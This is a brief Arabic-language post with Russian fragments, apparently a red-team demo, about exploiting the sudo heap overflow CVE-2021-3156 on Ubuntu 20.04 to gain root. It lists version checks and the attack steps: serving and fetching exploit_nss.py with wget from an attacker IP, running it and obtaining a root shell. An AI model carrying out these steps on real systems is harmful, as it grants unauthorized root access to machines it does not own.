
CVE-2021-3156-Exploit-Demo
📅 التاريخ: 2025-06-08
✍️ المؤلف: @TopskiyPavelQwertyGang
🧠 Security Researcher | Red Team Enthusiast
sudoedit (sudo)Heap-overflow في sudoedit يسمح لمستخدم محلي بالحصول على صلاحيات الجذر عند تنفيذ الأمر sudoedit مع معاملات معدة مسبقًا.
الاستغلال نشط للإصدارات sudo < 1.9.5p2، بما في ذلك الصور الشائعة لأنظمة Ubuntu/Debian/CentOS. حتى مع تمكين ASLR، تظل الثغرة قابلة للاستغلال.
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (уязвим)
ASLR : 2 (включён)
glibc و sudo:ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
استغلال CVE-2021-3156 يظل ممكنًا حتى مع تمكين ASLR، إذا كان glibc ≥ 2.26 و sudo من إصدار ضعيف. تبين أن الاستغلال exploit_nss.py هو الأكثر استقرارًا، حيث يعمل من المحاولة الأولى عند تكوين NSS بشكل صحيح.
🧨 النظام تحت السيطرة.